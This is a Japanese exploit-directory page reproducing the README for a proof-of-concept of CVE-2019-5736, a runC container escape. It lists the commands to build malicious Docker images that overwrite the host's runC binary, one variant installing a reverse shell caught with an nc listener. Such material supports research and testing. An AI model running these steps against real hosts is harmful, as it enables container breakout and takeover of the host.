Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-CVE-2019-5736 — CVE-2019-5736の概念実証エクスプロイト。runCコンテナエスケープの脆弱性で、悪意のあるイメージとexecコマンドによるコンテナブレイクアウトを実証します。 | Kitploit
ツール/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
コンテナセキュリティペイロード生成脆弱性分析エクスプロイトレッドチーミングコンテナエスケープ
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

CVE-2019-5736の概念実証エクスプロイト。runCコンテナエスケープの脆弱性で、悪意のあるイメージとexecコマンドによるコンテナブレイクアウトを実証します。

リポジトリを見る
146年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


ビデオ: https://bit.ly/2WqvILb

ブログ記事: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

このエクスプロイトの原作者はTwistlock LabsのYuval Avrahami氏であることに注意してください。

POCの実行

POCを実行すると、ホスト上のrunCバイナリが上書きされることに注意してください。

POCの実行前に、runCバイナリ(通常は/usr/sbin/runc)のバックアップを作成することを強くお勧めします。

リポジトリをクローンします:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

runCを、文字列を出力するシンプルなプログラムで上書きします。

exec POCの実行:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

悪意のあるイメージPOC

runCを、localhost:2345に接続するシンプルなリバースシェルBashスクリプトで上書きします。

リバースシェルの待ち受け:

root@kitploit:~
$ nc -nvlp 2345

別のシェルで、悪意のあるイメージPOCを実行:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Reference

root@kitploit:~
See [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5736") for an explanation of CVE-2019-5736 and the POCs.

The malicious image POC is heavily based on [q3k's POC](https://github.com/q3k/cve-2019-5736-poc), so all credit goes to him.
ツールをダウンロード